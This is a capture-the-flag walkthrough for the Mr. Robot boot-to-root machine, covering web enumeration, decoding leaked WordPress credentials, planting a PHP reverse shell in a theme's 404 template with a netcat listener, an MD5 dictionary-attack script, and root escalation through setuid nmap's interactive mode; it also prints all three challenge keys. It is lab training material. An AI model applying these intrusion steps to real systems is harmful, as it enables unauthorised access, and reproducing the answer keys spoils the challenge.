Introduction
The Mr. Robot CTF is a boot-to-root challenge themed on the TV show Mr. Robot. The target is a deliberately vulnerable Linux virtual machine and the objective is to recover three keys hidden on it, the last of which is only readable by root. The machine is available as a room on TryHackMe; the original image was published on VulnHub.
Understanding the Challenge
There are no separate levels; the three keys follow the usual phases of a penetration test. Key 1 is obtained through web enumeration alone. Key 2 requires a foothold on the box (a reverse shell obtained through WordPress) followed by a lateral move to the robot user by recovering that user’s password from an MD5 hash. Key 3 requires a local privilege escalation to root. Each stage leaves a clue pointing at the next, and the room gives a short hint per key.
Tools Required
Everything in this walkthrough is done with standard tooling:
nmap: port and service discovery on the target, and later the privilege-escalation vector itself (an old setuid copy installed on the box).
curl: fetching robots.txt, the keys and the leaked credentials.
gobuster: directory brute forcing against the web server.
base64: decoding the leaked credential string.
netcat (nc): catching the reverse shell.
python: spawning a TTY inside the reverse shell so that su can prompt for a password.
An MD5 lookup or cracker (an online hash database, john or hashcat) for the robot user’s password hash.
Getting Started
Deploy the machine from the TryHackMe room and connect to it through the TryHackMe VPN, or download the VulnHub image and import it into VirtualBox or VMware. In the walkthrough below the target has the address 10.10.185.196; substitute the address of your own instance. The room asks three questions, covered in order below:
#1 - What is key 1? Found via robots.txt.
#2 - What is key 2? Found in /home/robot after the WordPress foothold and the switch to the robot user.
#3 - What is key 3? Found in /root after escalating privileges through the setuid nmap binary.
#1 - What is key 1?
Hint: Robots
Let’s get started with an Nmap scan. It reports three ports, two of which are open (HTTP and HTTPS); SSH is closed.
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Let’s start with the web server. Following the hint, we fetch robots.txt. It discloses two files, one of which is key 1:
$ curl -s http://10.10.185.196/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
$ curl -s http://10.10.185.196/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
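As an added example (not part of the original walkthrough), here is a small Python helper that turns a robots.txt body into the list of URLs worth requesting. Besides the bare filenames this target lists, it handles the standard Disallow/Allow/Sitemap directives and comments. The sample robots.txt is constructed: its first three lines are what the target returned above, the rest are made up to exercise the directive handling; the base URL is the target address used throughout.

```python
from urllib.parse import urljoin

# Constructed sample. The first three lines are what the target's robots.txt
# returned above; the remaining lines are made up to show the standard
# directive syntax and a comment being handled as well.
SAMPLE_ROBOTS = """\
User-agent: *
fsocity.dic
key-1-of-3.txt
# a comment: ignored
Disallow: /wp-admin/
Disallow: /wp-admin/admin-ajax.php
Allow: /wp-admin/admin-ajax.php
Sitemap: http://10.10.185.196/sitemap.xml
Disallow:
"""

TARGET = "http://10.10.185.196/"   # the target used throughout this walkthrough

PATH_DIRECTIVES = ("disallow", "allow", "sitemap")
SKIP_DIRECTIVES = ("user-agent", "crawl-delay", "host")


def robots_paths(text, base=TARGET):
    """Return the URLs disclosed by a robots.txt body, in order, without
    duplicates.

    Disallow/Allow/Sitemap values are resolved against `base`; bare tokens
    that are not directives at all (as in this CTF) are treated as paths too.
    User-agent and friends are skipped, as are empty values and comments.
    """
    found = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop comments
        if not line:
            continue
        key, sep, value = line.partition(":")
        key = key.strip().lower()
        if sep and key in PATH_DIRECTIVES:
            if value.strip():
                found.append(urljoin(base, value.strip()))
            continue
        if sep and key in SKIP_DIRECTIVES:
            continue
        # Not a recognised directive: treat the whole line as a path or URL.
        found.append(urljoin(base, line))
    seen = set()
    return [u for u in found if not (u in seen or seen.add(u))]


if __name__ == "__main__":
    for url in robots_paths(SAMPLE_ROBOTS):
        print(url)
```

Feed the output to curl (or a loop over it) to pull every disclosed file in one go; the Allow line is deliberately a duplicate of a Disallow line to show the de-duplication.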
The second file, fsocity.dic, is a wordlist that we will probably need later, either for discovering other locations or as a password list. Note that it is large and heavily duplicated; run it through sort -u before handing it to any brute-forcing tool. Its first lines:
$ head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
Key1: 073403c8a58a1f80d943455fb30724b9
#2 - What is key 2?
Hint: White coloured font
gobuster discovers several locations, including:
/login (Status: 302)
/wp-content (Status: 301)
/admin (Status: 301)
/wp-login (Status: 200)
/license (Status: 200)
/wp-includes (Status: 301)
WordPress is installed. Moreover, the /license page discloses credentials at the very end of its text:
$ curl -s http://10.10.185.196/license | tr -d "\n"
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=
$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
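As an added example, not from the original post, the following Python snippet automates what we did by eye above: it scans a page body for base64-looking tokens, decodes only those that are valid base64 and yield printable text, and splits the result into user and password. The sample text is the /license content shown above, collapsed onto one line, with a constructed decoy token appended to show the filtering.

```python
import base64
import binascii
import re
import string

# Constructed sample: the /license text shown above, collapsed onto one line,
# plus a decoy token ("/////////////+++") that is base64-shaped but decodes to
# non-text bytes, to show it being filtered out.
SAMPLE_LICENSE = (
    "what you do just pull code from Rapid9 or some s@#% since when did you "
    "become a script kitty?do you want a password or something?"
    "ZWxsaW90OkVSMjgtMDY1Mgo= also: /////////////+++"
)

# 16+ base64-alphabet characters with optional padding; shorter runs are
# mostly ordinary words and not worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(string.printable)


def _is_text(data):
    """True if `data` is non-empty printable ASCII."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return bool(text) and all(ch in PRINTABLE for ch in text)


def find_base64_secrets(text):
    """Map every base64 token in `text` that decodes to printable ASCII onto
    its decoded value (trailing newline stripped, like the `base64 -d` output
    above). Tokens with a bad length or bad padding are skipped."""
    secrets = {}
    for token in B64_TOKEN.findall(text):
        if len(token) % 4:
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        if _is_text(raw):
            secrets[token] = raw.decode("ascii").rstrip("\r\n")
    return secrets


def split_credential(decoded):
    """'user:password' -> ('user', 'password'); None when the shape differs."""
    user, sep, password = decoded.partition(":")
    if sep and user and password:
        return user, password
    return None


if __name__ == "__main__":
    for token, plain in find_base64_secrets(SAMPLE_LICENSE).items():
        print(token, "->", plain, split_credential(plain))
```

One caveat: a token glued directly to a preceding word (no separator) is matched as one longer run, and the strict decoder will usually reject it or return garbage; if a page looks like it hides something, also inspect the raw text by hand as we did here.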
Let’s try these credentials against the WordPress login (/wp-login). They work and we are logged in as administrator! Several points to note here:
The WordPress version is 4.3.1; with 5.4.1 being the current release at the time of writing, the install is badly out of date and very likely vulnerable. With administrator rights, though, we do not even need an exploit.
There are 2 users:
Username    Name             Email                   Role
elliot      Elliot Alderson  elliot@mrrobot.com      Administrator
mich05654   krista Gordon    kgordon@therapist.com   Subscriber
As administrators, we can edit the theme files. Go to Appearance > Editor and replace the content of the 404 template (404.php) with a PHP reverse shell, setting the IP to your own machine and the port to the one your listener will use (1234 below).
Now open a listener:
$ nc -nlvp 1234
Then request a page that does not exist, for instance http://10.10.185.196/404.php: WordPress renders the modified 404 template and the shell connects back to the listener.
The next key is in /home/robot, but it is readable only by the robot user, whereas our shell runs as daemon (the web server account):
$ ls -l /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
$ whoami
daemon
We are also given the raw MD5 hash of the robot user’s password:
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Looking this hash up in an online MD5 database gives the password abcdefghijklmnopqrstuvwxyz (it is the well-known MD5 test vector for the lowercase alphabet). Let’s try to switch to robot.
$ su - robot
su: must be run from a terminal
su refuses to run without a controlling terminal, since it needs one to prompt for the password. Not a problem: we spawn a PTY with Python (after confirming it is installed):
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
robot
$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Key2: 822c73956184f694993bede3eb39f959
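The robot hash above was resolved with an online lookup; offline, the same result comes from a dictionary attack, which is exactly what fsocity.dic is for. As an added example (not part of the original walkthrough), this Python script parses a user:hash file, de-duplicates the wordlist, and tries each word both as-is and with a trailing newline, because hashes produced with `echo word | md5sum` include the newline. The hash line is the one found in /home/robot; the wordlist is constructed and deliberately contains duplicates.

```python
import hashlib

# The hash line is the one found in /home/robot/password.raw-md5 above.
SAMPLE_HASH_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"

# Constructed wordlist. Like fsocity.dic it contains duplicates; the real file
# is far larger and should be de-duplicated the same way before use.
SAMPLE_WORDLIST = """\
true
false
wikia
abcdefghijklmnopqrstuvwxyz
true
false
Wikia
password
abcdefghijklmnopqrstuvwxyz
"""

HEX = set("0123456789abcdef")


def parse_hash_file(text):
    """'user:hexdigest' (or bare hexdigest) lines -> {hexdigest: user_or_None}."""
    targets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.rpartition(":")
        digest = digest.lower()
        if len(digest) == 32 and set(digest) <= HEX:
            targets[digest] = user or None
    return targets


def unique_words(text):
    """Yield the wordlist's lines once each, preserving first-seen order."""
    seen = set()
    for word in text.splitlines():
        if word not in seen:
            seen.add(word)
            yield word


def wordlist_stats(text):
    """(total lines, unique lines): shows how much de-duplication saves."""
    words = text.splitlines()
    return len(words), len(set(words))


def crack_md5(hash_text, wordlist_text):
    """Dictionary attack on raw MD5 hashes. Each word is tried as-is and with
    a trailing newline (hashes made with `echo word | md5sum` include it).
    Returns {user_or_digest: recovered_password}."""
    targets = parse_hash_file(hash_text)
    found = {}
    for word in unique_words(wordlist_text):
        for candidate in (word, word + "\n"):
            digest = hashlib.md5(candidate.encode()).hexdigest()
            if digest in targets:
                found[targets[digest] or digest] = candidate
        if len(found) == len(targets):
            break
    return found


if __name__ == "__main__":
    print(wordlist_stats(SAMPLE_WORDLIST))
    print(crack_md5(SAMPLE_HASH_FILE, SAMPLE_WORDLIST))
```

Against the real fsocity.dic, read the file into `wordlist_text` (or stream it line by line) and keep the de-duplication: the unique entries are a small fraction of the file, so the attack finishes in seconds.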
#3 - What is key 3?
Hint: nmap
The last key is very likely in /root, so we need to escalate privileges.
Recall that the nmap scan showed port 22 (SSH) as closed, probably because the service is not running, so there is no alternative way onto the box: the escalation has to be done locally from our robot shell.
Unfortunately, robot is not allowed to use sudo:
$ sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz
Sorry, user robot may not run sudo on linux.
OK, let’s list the programs owned by root that have the setuid bit set:
$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Interestingly, nmap is on the list (and it is the hint for this key). It is also a very old release (3.81), while the current release at the time of writing is 7.80.
$ which nmap
/usr/local/bin/nmap
$ nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
As documented for this binary (GTFOBins, for instance), nmap releases 2.02 to 5.21 had an interactive mode (--interactive) in which a command prefixed with ! is run through a shell.
Since the binary is setuid root, those commands run as root:
$ ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
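As an added example that is not part of the original walkthrough, the Python below does the two checks we just did by hand: it pulls the setuid-root entries out of `ls -l` output (catching the capital-S form, where the setuid bit is set without owner execute, and ignoring setuid binaries owned by other users, which would not give root), and it decides from an `nmap --version` banner whether the release falls in the 2.02 to 5.21 range that still has --interactive. Only the nmap line of the sample listing is from the page; the other lines are constructed.

```python
import re

# Constructed `ls -l` listing. The nmap line is the one shown above; the other
# lines are made up to exercise the edge cases: a setuid binary owned by a
# non-root user, the capital-S form (setuid set, owner execute not), and an
# ordinary binary.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 40152 Nov 13 2015 /bin/su
-rwxr-xr-x 1 root root 44680 Nov 13 2015 /bin/ls
-rwsr-xr-x 1 daemon daemon 512 Nov 13 2015 /usr/local/bin/daemon-helper
-rwSr--r-- 1 root root 1024 Nov 13 2015 /opt/odd
"""


def parse_ls_line(line):
    """Split one `ls -l` line into its fields. The date is always three
    tokens ("Nov 13 2015" or "Nov 13 10:45"), so the path is field 9; a
    maxsplit of 8 keeps paths containing spaces intact."""
    parts = line.split(None, 8)
    if len(parts) < 9 or len(parts[0]) < 10:
        return None
    return {"mode": parts[0], "owner": parts[2], "group": parts[3], "path": parts[8]}


def setuid_root(ls_text):
    """Paths that are setuid and owned by root.

    In the symbolic mode the owner-execute slot (index 3) reads 's' when both
    setuid and execute are set and 'S' when setuid is set without execute.
    Both mean the bit is set, so both are reported; setuid files owned by
    other users are not, since they would not give root."""
    hits = []
    for line in ls_text.splitlines():
        entry = parse_ls_line(line)
        if entry and entry["owner"] == "root" and entry["mode"][3] in "sS":
            hits.append(entry["path"])
    return hits


# Release range that shipped --interactive, as stated in the text above.
INTERACTIVE_FIRST = (2, 2)
INTERACTIVE_LAST = (5, 21)
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)")


def nmap_has_interactive(banner):
    """True if the version in an `nmap --version` banner lies within the
    --interactive range; False if no version can be parsed."""
    match = VERSION_RE.search(banner)
    if not match:
        return False
    version = (int(match.group(1)), int(match.group(2)))
    return INTERACTIVE_FIRST <= version <= INTERACTIVE_LAST


if __name__ == "__main__":
    for path in setuid_root(SAMPLE_LS):
        print("setuid root:", path)
    print(nmap_has_interactive("nmap version 3.81 ( http://www.insecure.org/nmap/ )"))
```

On a real box, generate the listing with `find / -user root -perm -4000 -type f -exec ls -l {} + 2>/dev/null` and paste it into `setuid_root`; the same parser also works for hardening reviews, where anything outside the expected set of distribution binaries deserves a look.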
Let’s start nmap in interactive mode:
$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
waiting to reap child : No child processes
nmap> !ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
Key3: 04787ddef27c3dee1ee161b21670b4e4